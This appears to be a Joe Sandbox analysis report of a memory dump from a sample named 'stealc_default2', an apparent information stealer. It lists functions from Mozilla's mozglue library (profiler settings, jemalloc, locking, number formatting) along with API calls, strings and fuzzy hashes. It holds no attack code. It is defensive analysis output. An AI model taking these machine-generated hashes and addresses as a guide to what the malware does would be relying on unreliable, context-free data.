String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: e9a90d1632a153d953eecf595b827702d11d19d09d1e67a8f323fd155c37cd82
Instruction ID: b11a715022aecde092ab6367d8904b8c6375c06f923a2030efbfeb8bbb253d8e
Opcode Fuzzy Hash: e9a90d1632a153d953eecf595b827702d11d19d09d1e67a8f323fd155c37cd82
Instruction Fuzzy Hash: 0CF1D2709053299FDB20DF24CC88B9AB7F5AF46318F1586D9E819A7681D731BE84CF90

Function 6C10E2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,6C10E2A6), ref: 6C10E35E
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6C10E2A6), ref: 6C10E386
GetCurrentThreadId.KERNEL32 ref: 6C10E3E4
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6C10E4AB
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E4F5
GetCurrentThreadId.KERNEL32 ref: 6C10E577
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E584
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C10E8A6

Part of subcall function 6C0CB7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C0CB7CF
Part of subcall function 6C0CB7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0CB808

Part of subcall function 6C11B800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6C140FB6,00000000,?,?,6C10E69E), ref: 6C11B830

memset.VCRUNTIME140(?,00000000,00000000), ref: 6C10E6DA

Part of subcall function 6C11B8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6C11B916
Part of subcall function 6C11B8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6C11B94A

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C10E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C10E883

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C10E5A1, 6C10E5CC, 6C10E5FF, 6C10E62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C10E655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C10E722, 6C10E750, 6C10E7A2
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C10E777
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C10E826, 6C10E850

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 2698983630-53385798
Opcode ID: 6b2e02faf4c13510ec7f784b25a8b1db323f9d072fc0cedbe7368c64ae78fef9
Instruction ID: cad19db189804caa86eccc7ae6eeba8c88aa96c28109c2ebfecfb41bcb510053
Opcode Fuzzy Hash: 6b2e02faf4c13510ec7f784b25a8b1db323f9d072fc0cedbe7368c64ae78fef9
Instruction Fuzzy Hash: 1402AA75704205DFCB10DF29C484A6ABBF5FF89308F14892DE89A9BB40DB30EA55CB91

Function 6C107E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON

Download Yara Rule

Strings

(pre-xul), xrefs: 6C107E88
data, xrefs: 6C108280, 6C1083E1
schema, xrefs: 6C1081E3, 6C108311
name, xrefs: 6C107ECF, 6C108335

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema
API String ID: 3412268980-999448898
Opcode ID: 02354f14eff357974a6accc8d1b3b2c5fecf0cee2a3daff657456164a8c28bd7
Instruction ID: d15e6b665b70b641ea5a80efb3c288753fa7effefa30ed2e25710c810f82035e
Opcode Fuzzy Hash: 02354f14eff357974a6accc8d1b3b2c5fecf0cee2a3daff657456164a8c28bd7
Instruction Fuzzy Hash: DDE15EB1B043548FC710CF68884176BF7E9BF89318F15892DE899A7791DB70ED098B92

Function 6C0ED4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0FD1C5), ref: 6C0ED4F2
LeaveCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0FD1C5), ref: 6C0ED50B

Part of subcall function 6C0CCFE0: EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0CCFF6
Part of subcall function 6C0CCFE0: LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0CD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0FD1C5), ref: 6C0ED52E
EnterCriticalSection.KERNEL32(6C14E7DC), ref: 6C0ED690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C0ED6A6
LeaveCriticalSection.KERNEL32(6C14E7DC), ref: 6C0ED712
LeaveCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0FD1C5), ref: 6C0ED751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C0ED7EA

Strings

<jemalloc>, xrefs: 6C0ED827
: (malloc) Error initializing arena, xrefs: 6C0ED82C

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: ee2458e7fdb0af59df3a002d4306a4b4723c99188cbd3cb6ea036e7414ac2f5d
Instruction ID: d98518b14e1108d93156926c9657aacde67557c38bfcf7d3dd6be3f3eabe60c2
Opcode Fuzzy Hash: ee2458e7fdb0af59df3a002d4306a4b4723c99188cbd3cb6ea036e7414ac2f5d
Instruction Fuzzy Hash: D791BF71A447018FD714DF29C49072AB7E2EFC9318F55892EE5AAC7B81E730E945CB82

Function 6C124EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C124EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C124F2E
moz_xmalloc.MOZGLUE ref: 6C124F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C124F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C1252B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C1252E6
Sleep.KERNEL32(00000010), ref: 6C125481
free.MOZGLUE(?), ref: 6C125498

Strings

(, xrefs: 6C125250

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: 68403b335855892f399af229945a4b1a5b3331fd3e7c4bb0232da8a358de88e2
Instruction ID: d3ef0b518d60147cb35c36e7ce0ab2d6026b13f7d2972bb1721a878b6fda7ff0
Opcode Fuzzy Hash: 68403b335855892f399af229945a4b1a5b3331fd3e7c4bb0232da8a358de88e2
Instruction Fuzzy Hash: 9EF1D271A18B408FC716DF38C85062BB7F5AFD6298F05C72EF85AA7651DB31D8428B81

Function 6C0D7810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C14E744), ref: 6C0D7885
LeaveCriticalSection.KERNEL32(6C14E744), ref: 6C0D78A5
EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0D78AD
LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0D78CD
EnterCriticalSection.KERNEL32(6C14E7DC), ref: 6C0D78D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0D78E9
EnterCriticalSection.KERNEL32(00000000), ref: 6C0D795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6C0D79BB
LeaveCriticalSection.KERNEL32(?), ref: 6C0D7BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0D7C82
LeaveCriticalSection.KERNEL32(6C14E7DC), ref: 6C0D7CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C0D7DAF

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID:
API String ID: 759993129-0
Opcode ID: e75b2295fe2cfe153fbb1c5fb1b73653b0cd08ec4f698839231d3b46b639e751
Instruction ID: 09159f0e978725f348cbe4670b813629fe8864b67d963712d76666a8d3a283ab
Opcode Fuzzy Hash: e75b2295fe2cfe153fbb1c5fb1b73653b0cd08ec4f698839231d3b46b639e751
Instruction Fuzzy Hash: DC023C71A013198FDB54CF19D984799B7F5FF88318F6682AAD809A7615D730BE90CF80

Function 6C105190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C1051DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C10529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C1052FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C10536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C1053F7

Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C1056C3
__Init_thread_footer.LIBCMT ref: 6C1056E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C1056BE

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: c2d7863f19ac58667b9a51ea8cccf2b9314242bb253b873063191348c8ea3e36
Instruction ID: d7bbb12d0cd515ec6455c76e32e02160ffbf1831c7e4d59eb8a056332abfb55f
Opcode Fuzzy Hash: c2d7863f19ac58667b9a51ea8cccf2b9314242bb253b873063191348c8ea3e36
Instruction Fuzzy Hash: EEE18D75A14F45CAC712DF358850267B7B9BFAB388F10DB0EE8AF2A951DF30A4469701

Function 6C127030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6C127046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C127060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C12707E

Part of subcall function 6C0D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0D81DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C127096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C12709C
LocalFree.KERNEL32(?), ref: 6C1270AA

Strings

### ERROR: %s: %s, xrefs: 6C127087
(null), xrefs: 6C12706A, 6C127083

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: bdd49075cd2e5c90aff6d77d6cb59cf1e8e13f18f4229ddc72446a7ae91a7f41
Instruction ID: 948798c06a7dc0b7dd82de01770cf057dc568fa603f0eeeea2a58ab3e3e70030
Opcode Fuzzy Hash: bdd49075cd2e5c90aff6d77d6cb59cf1e8e13f18f4229ddc72446a7ae91a7f41
Instruction Fuzzy Hash: F40179B1A00104AFDB04ABA5DC4ADAF7BBCEF49259F014425FA05A7241E671B9188BE1

Function 6C112C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C112C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C112C61

Part of subcall function 6C0C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0C4E5A
Part of subcall function 6C0C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0C4E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C112C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C112E2D

Part of subcall function 6C0D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0D81DE

Strings

(root), xrefs: 6C11354F
expected a Time entry, xrefs: 6C112E36
ProfileBuffer parse error: %s, xrefs: 6C112E3B

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 686b80d743dd3d018972426ceb2e84c69b472d3751a69f3bfea79dc40edccd26
Instruction ID: 9c68ddfc840a80a7a1ea3ac26f3f4126f9ea4355eefd04cf8d1af7a232730d7c
Opcode Fuzzy Hash: 686b80d743dd3d018972426ceb2e84c69b472d3751a69f3bfea79dc40edccd26
Instruction Fuzzy Hash: B491D2B060C7408FC724DF24C49469FB7E1EF8A358F50892DE5998BB50EB34D54ACB52

Function 6C129E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C129F3D
__aulldiv.LIBCMT ref: 6C129F77
__aullrem.LIBCMT ref: 6C129F8C
__aulldiv.LIBCMT ref: 6C12A023

Strings

-Infinity, xrefs: 6C129E60, 6C129E7B
NaN, xrefs: 6C129EAB

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 7ca683e5fe2dbd8d375cb9214574d5e30fcdac3a444c6ed467342b12c2f644e2
Instruction ID: 305b05d8f6fe2ee110e1a503a3313687f7760bc05b1c7fa48818047a309a404a
Opcode Fuzzy Hash: 7ca683e5fe2dbd8d375cb9214574d5e30fcdac3a444c6ed467342b12c2f644e2
Instruction Fuzzy Hash: 49C1DF35E043188FDB14CFA8C8607AEB7B6FF89314F154529D505ABB80DB78A989CB91

Function 6C12B910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0D9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C12B92D), ref: 6C0D9BC8
Part of subcall function 6C0D9B80: __Init_thread_footer.LIBCMT ref: 6C0D9BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0D03D4,?), ref: 6C12B955
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,0000001C), ref: 6C12B9A5
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,00000000), ref: 6C12BA20
RtlNtStatusToDosError.NTDLL ref: 6C12BA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C12BA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C12BA86

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: a6402dc52e53157432eb3ae37c2731a0d88f3877088dd7736b54e1a727d7a0c6
Instruction ID: d8ed16e4f05d70343eb3b9c6b18a49dd4892b1562a9cc687fa0a65ff29b82c31
Opcode Fuzzy Hash: a6402dc52e53157432eb3ae37c2731a0d88f3877088dd7736b54e1a727d7a0c6
Instruction Fuzzy Hash: 08519F75E01229DFDF14CFA8D890ADEB7B6EF88318F154129E906B7704DB34AD858B90

Function 6C108AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0FFA80: GetCurrentThreadId.KERNEL32 ref: 6C0FFA8D
Part of subcall function 6C0FFA80: AcquireSRWLockExclusive.KERNEL32(6C14F448), ref: 6C0FFA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108CBA
free.MOZGLUE(?), ref: 6C108CCF

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: e2ea91b3ca54d47b69a6d26dd39d6fa33e286dbc6bdff905ea684ebdb653b9ce
Instruction ID: fbdbd8f902e3de5b83e18ff95e6e3ff1b108c730854894c93359bc3f075b6751
Opcode Fuzzy Hash: e2ea91b3ca54d47b69a6d26dd39d6fa33e286dbc6bdff905ea684ebdb653b9ce
Instruction Fuzzy Hash: 68718F75A18B008FD704CF29C58065AB7F1FF99318F558A5EE9899B722EB70F884CB41

Function 6C0CF280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL(000000FF,?,00000000,?,0000001C,?), ref: 6C0CF2B4
GetProcAddress.KERNEL32(00000000,?), ref: 6C0CF2F0
NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 6C0CF308
RtlNtStatusToDosError.NTDLL ref: 6C0CF36B
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6C0CF371

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
String ID:
API String ID: 1171715205-0
Opcode ID: 7d8db8461f9d4613630820dc2719310a0151e2319868a15d9e72a8420265844d
Instruction ID: a9a275eb6347fb4dbb9b820fb15b3a1536162346c314d4e5a09ea6751a61aa9d
Opcode Fuzzy Hash: 7d8db8461f9d4613630820dc2719310a0151e2319868a15d9e72a8420265844d
Instruction Fuzzy Hash: 8521A570B05318FBEB10AA55CE54BEF76FCAB4535CF14422AE434965C0D7B49988C763

Function 6C13545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C138A4B

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 5240b5e6c822648ec2bb73d1e12d5c5294031dbf71df05dc957a47d0b4235344
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 48B1D772A0022ACFDB14CF68CC90799B7B2EF95318F1512AAC54DEB785D730A985CF90

Function 6C13542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C1388F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C13925C

Memory Dump Source

